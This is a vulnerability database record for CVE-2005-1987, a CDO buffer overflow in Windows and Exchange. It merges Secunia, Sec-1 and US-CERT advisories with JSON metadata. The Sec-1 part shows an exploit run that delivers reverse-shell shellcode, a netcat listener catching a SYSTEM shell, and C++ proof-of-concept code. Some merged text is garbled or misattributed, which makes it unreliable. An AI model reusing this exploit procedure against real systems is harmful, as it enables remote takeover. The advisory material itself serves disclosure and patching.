var-200510-0005
Vulnerability from variot
Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library.
The vulnerability has been reported in the following versions: * Windows 2000 (remote code execution) * Windows XP Service Pack 1 (remote code execution) * Windows XP Service Pack 2 (local privilege escalation) * Windows Server 2003 (local privilege escalation) * Windows Server 2003 Service Pack 1 (local privilege escalation)
3) An error in the MSDTC when validating TIP (Transaction Internet Protocol) requests can be exploited to cause the service to stop responding via a specially crafted network message. The malicious TIP message can be transferred through the affected system to another, which causes the MSDTC on both systems to stop responding.
Successful exploitation requires that the TIP protocol is enabled for MSDTC.
SOLUTION: Apply patches.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. SEC-1 LTD. The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable.
The vulnerability can be exploited by crafting an e-mail with a large
header name such as "Content-Type
Exploit Availability:
Sec-1 do not release exploit code to the general public. Attendees of the Sec-1 Applied Hacking & Intrusion prevention course will receive a copy of this exploit as part of the Sec-1 Exploit Arsenal. See: http://www.sec-1.com/applied_hacking_course.html
Exploit Example:
[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53
Enter IP address of your attacking host: 10.0.0.200 Enter Port for shellcode to connect back on: 80
[]----Connected OK! []----Sending MAIL FROM: me@test.com []----Sending RCPT TO: me@test.com []----Sending Malformed E-mail body []----Shellcode Length: 316 []----Shellcode type: Reverse shell [*]----Done.
[!] Note this may take a while. Inetinfo will crash and restart This will happen until a nops are reached. You may also want to clear the queue to restore Inetinfo.exe by deleting malformed
e-mail from c:\Inetpub\mailroot\Queue
[root@homer PoC]# nc -l -p 80 -v listening on [any] 80 ...
10.0.0.53: inverse host lookup failed: Unknown host connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>c:\whoami NT AUTHORITY\SYSTEM
C:\WINNT\system32>
Vendor Response:
Microsoft have released the following information including a fix, http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CAN-2005-1987
Demonstration:
The following CDO code demonstrates the problem.
Step 1.
Create an E-mail named vuln.eml including a large "Content-Type:" header.
Step 2.
// Compile with -GX option
import no_namespace rename("EOF", "adoEOF")
import rename_namespace("CDO")
include
int main() {
CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush();
for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; }
} catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); }
CoUninitialize();
return 0;
}
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
Copyright 2005 Sec-1 LTD. All rights reserved.
NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Technical Cyber Security Alert TA05-284A
Microsoft Windows, Internet Explorer, and Exchange Server Vulnerabilities
Original release date: October 11, 2005 Last revised: -- Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
* Microsoft Exchange Server
For more complete information, refer to the Microsoft Security Bulletin Summary for October 2005.
Overview
Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server.
I. Description
Microsoft Security Bulletins for October 2005 address vulnerabilities in Windows and Internet Explorer. Further information is available in the following US-CERT Vulnerability Notes:
VU#214572 - Microsoft Plug and Play fails to properly validate user supplied data
Microsoft Plug and Play contains a flaw in the handling of message buffers that may result in local or remote arbitrary code execution or denial-of-service conditions. (CAN-2005-1987)
VU#922708 - Microsoft Windows Shell fails to handle shortcut files properly
Microsoft Windows Shell does not properly handle some shortcut files and may permit arbitrary code execution when a specially-crafted file is opened. (CAN-2005-0163)
II. An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided the updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the following US-CERT Vulnerability Notes for workarounds.
Appendix A. References
* Microsoft Security Bulletin Summary for October 2005 -
<http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>
* US-CERT Vulnerability Note VU#214572 -
<http://www.kb.cert.org/vuls/id/214572>
* US-CERT Vulnerability Note VU#883460 -
<http://www.kb.cert.org/vuls/id/883460>
* US-CERT Vulnerability Note VU#922708 -
<http://www.kb.cert.org/vuls/id/922708>
* US-CERT Vulnerability Note VU#995220 -
<http://www.kb.cert.org/vuls/id/995220>
* US-CERT Vulnerability Note VU#180868 -
<http://www.kb.cert.org/vuls/id/180868>
* US-CERT Vulnerability Note VU#950516 -
<http://www.kb.cert.org/vuls/id/950516>
* US-CERT Vulnerability Note VU#959049 -
<http://www.kb.cert.org/vuls/id/959049>
* US-CERT Vulnerability Note VU#680526 -
<http://www.kb.cert.org/vuls/id/680526>
* CAN-2005-2120 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>
* CAN-2005-1987 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>
* CAN-2005-2122 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>
* CAN-2005-2128 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>
* CAN-2005-2119 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>
* CAN-2005-1978 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>
* CAN-2005-2127 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>
* CAN-2005-0163 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>
* Microsoft Update - <https://update.microsoft.com/microsoftupdate>
The most recent version of this document can be found at:
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
Feedback can be directed to US-CERT. Please send email to: cert@cert.org with "TA05-284A Feedback VU#959049" in the subject.
Revision History
Oct 11, 2004: Initial release
Produced 2005 by US-CERT, a government organization.
Terms of use
http://www.us-cert.gov/legal.html
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c 1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe /9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog== =5hXu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200510-0005",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 4.8,
"vendor": "microsoft",
"version": null
},
{
"model": "exchange server",
"scope": "eq",
"trust": 2.7,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": null
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": null
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "r2"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": null
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "sp1"
},
{
"model": "windows 2000",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "windows server 2003",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "itanium"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "64-bit"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp1"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "r2"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp4"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp2"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp1"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "64-bit"
},
{
"model": "networks centrex ip element manager",
"scope": "eq",
"trust": 0.3,
"vendor": "nortel",
"version": "8.0"
},
{
"model": "networks centrex ip element manager",
"scope": "eq",
"trust": 0.3,
"vendor": "nortel",
"version": "7.0"
},
{
"model": "networks centrex ip element manager",
"scope": "eq",
"trust": 0.3,
"vendor": "nortel",
"version": "2.5"
},
{
"model": "networks centrex ip client manager",
"scope": "eq",
"trust": 0.3,
"vendor": "nortel",
"version": "8.0"
},
{
"model": "networks centrex ip client manager",
"scope": "eq",
"trust": 0.3,
"vendor": "nortel",
"version": "7.0"
},
{
"model": "networks centrex ip client manager",
"scope": "eq",
"trust": 0.3,
"vendor": "nortel",
"version": "2.5"
},
{
"model": "networks centrex ip client manager",
"scope": null,
"trust": 0.3,
"vendor": "nortel",
"version": null
},
{
"model": "windows xp professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "x64"
},
{
"model": "windows xp professional sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp professional sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp professional",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp media center edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp media center edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp media center edition",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"model": "windows server web edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server web edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"model": "windows server standard edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"model": "windows server enterprise edition itanium sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server enterprise edition itanium",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server enterprise edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"model": "windows server datacenter edition itanium sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server datacenter edition itanium",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server datacenter edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows datacenter server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows datacenter server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows datacenter server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows datacenter server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows datacenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0"
},
{
"model": "exchange server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#995220"
},
{
"db": "CERT/CC",
"id": "VU#883460"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#950516"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "15067"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
},
{
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:microsoft:exchange_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_2000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_xp",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Gary O\u0027leary-Steele garyo@sec-1.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
}
],
"trust": 0.6
},
"cve": "CVE-2005-1987",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2005-1987",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2005-1987",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#680526",
"trust": 0.8,
"value": "28.35"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#995220",
"trust": 0.8,
"value": "14.70"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#883460",
"trust": 0.8,
"value": "10.13"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#740372",
"trust": 0.8,
"value": "10.13"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#950516",
"trust": 0.8,
"value": "28.10"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#939605",
"trust": 0.8,
"value": "44.55"
},
{
"author": "NVD",
"id": "CVE-2005-1987",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200510-082",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#995220"
},
{
"db": "CERT/CC",
"id": "VU#883460"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#950516"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "JVNDB",
"id": "JVNDB-2005-000592"
},
{
"db": "CNNVD",
"id": "CNNVD-200510-082"
},
{
"db": "NVD",
"id": "CVE-2005-1987"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. \nThis issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library. \n\nThe vulnerability has been reported in the following versions:\n* Windows 2000 (remote code execution)\n* Windows XP Service Pack 1 (remote code execution)\n* Windows XP Service Pack 2 (local privilege escalation)\n* Windows Server 2003 (local privilege escalation)\n* Windows Server 2003 Service Pack 1 (local privilege escalation)\n\n3) An error in the MSDTC when validating TIP (Transaction Internet\nProtocol) requests can be exploited to cause the service to stop\nresponding via a specially crafted network message. The malicious TIP\nmessage can be transferred through the affected system to another,\nwhich causes the MSDTC on both systems to stop responding. \n\nSuccessful exploitation requires that the TIP protocol is enabled for\nMSDTC. \n\nSOLUTION:\nApply patches. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. SEC-1 LTD. The vulnerability exists when \nevent sinks are used within Microsoft Exchange 2000 or Microsoft Mail\nservices to parse e-mail content. Several Content Security packages\nwere identified to be vulnerable/exploitable. \n\nThe vulnerability can be exploited by crafting an e-mail with a large \nheader name such as \"Content-Type\u003cLARGE STRING\u003e:\". \nA failure to correctly determine the length of the string results in a\nstack overflow. Under \ncertain conditions the vulnerability can also be used to bypass content\nsecurity mechanisms such as virus and content security scanners. Proof\nof\nconcept code to recreate the problem is included at the bottom of this \nadvisory. \n\n\nExploit Availability:\n\nSec-1 do not release exploit code to the general public. \nAttendees of the Sec-1 Applied Hacking \u0026 Intrusion prevention course \nwill receive a copy of this exploit as part of the Sec-1 Exploit\nArsenal. \nSee: http://www.sec-1.com/applied_hacking_course.html\n\n\nExploit Example:\n\n[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53\n\nEnter IP address of your attacking host: 10.0.0.200\nEnter Port for shellcode to connect back on: 80\n\n[*]----Connected OK!\n[*]----Sending MAIL FROM: me@test.com\n[*]----Sending RCPT TO: \u003cme@test.com\u003e\n[*]----Sending Malformed E-mail body\n[*]----Shellcode Length: 316\n[*]----Shellcode type: Reverse shell\n[*]----Done. \n\n[!]\tNote this may take a while. Inetinfo will crash and restart\n\tThis will happen until a nops are reached. You may also want \n\tto clear the queue to restore Inetinfo.exe by deleting malformed\n\n\te-mail from c:\\Inetpub\\mailroot\\Queue\n\n[root@homer PoC]# nc -l -p 80 -v\nlistening on [any] 80 ... \n\n10.0.0.53: inverse host lookup failed: Unknown host\nconnect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100\nMicrosoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp. \n\n\nC:\\WINNT\\system32\u003ec:\\whoami\nNT AUTHORITY\\SYSTEM\n\nC:\\WINNT\\system32\u003e\n\n\nVendor Response:\n\nMicrosoft have released the following information including a fix,\nhttp://www.microsoft.com/technet/security/bulletin/MS05-048.mspx\n\n\nCommon Vulnerabilities and Exposures (CVE) Information:\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned \nthe following names to these issues. These are candidates for \ninclusion in the CVE list (http://cve.mitre.org), which standardizes \nnames for security problems. \n\n\t\tCAN-2005-1987\n\n\nDemonstration:\n\nThe following CDO code demonstrates the problem. \n\nStep 1. \n\nCreate an E-mail named vuln.eml including a large \"Content-Type:\"\nheader. \n\nStep 2. \n\n// Compile with -GX option\n#import \u003cmsado15.dll\u003e no_namespace rename(\"EOF\", \"adoEOF\")\n#import \u003ccdosys.dll\u003e rename_namespace(\"CDO\")\n\n#include \u003cstdio.h\u003e\n\nint main()\n{\n\nCoInitialize(0);\ntry\n{\n CDO::IMessagePtr spMsg(__uuidof(CDO::Message));\n _StreamPtr spStream(spMsg-\u003eGetStream());\n spStream-\u003ePosition = 0;\n spStream-\u003eType = adTypeBinary;\n spStream-\u003eLoadFromFile(\"vuln.eml\");\n spStream-\u003eFlush();\n\n for(long i = 1; i \u003c= spMsg-\u003eBodyPart-\u003eBodyParts-\u003eCount; i++)\n {\n\tCDO::IBodyPartPtr spBdy = spMsg-\u003eBodyPart-\u003eBodyParts-\u003eItem[i];\n\t_variant_t v =\nspBdy-\u003eFields-\u003eItem[\"urn:schemas:mailheader:Content-Type\"]-\u003eValue;\n }\n\n}\n catch(_com_error \u0026e)\n\t{\n\tprintf(\"COM error[0x%X, %s]\\n\", e.Error(),\n(LPCTSTR)e.Description());\n\t}\n\tcatch(...)\n\t{\n\tprintf(\"General exception\\n\");\n\t}\n\n\tCoUninitialize();\n\n\treturn 0;\n}\n\n\tCDO::IBodyPartPtr spBdy = spMsg-\u003eBodyPart-\u003eBodyParts-\u003eItem[i];\n\t_variant_t v =\nspBdy-\u003eFields-\u003eItem[\"urn:schemas:mailheader:Content-Type\"]-\u003eValue;\n\n\nCopyright 2005 Sec-1 LTD. All rights reserved. \n**************************************************************\nNEW: Sec-1 Hacking Training - Learn to breach network security \nto further your knowledge and protect your network \nhttp://www.sec-1.com/applied_hacking_course.html\n**************************************************************\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n Technical Cyber Security Alert TA05-284A \n Microsoft Windows, Internet Explorer, and Exchange Server\n Vulnerabilities\n\n Original release date: October 11, 2005\n Last revised: --\n Source: US-CERT\n\nSystems Affected\n\n * Microsoft Windows\n * Microsoft Internet Explorer\n * Microsoft Exchange Server\n\n For more complete information, refer to the Microsoft Security\n Bulletin Summary for October 2005. \n\nOverview\n\n Microsoft has released updates that address critical 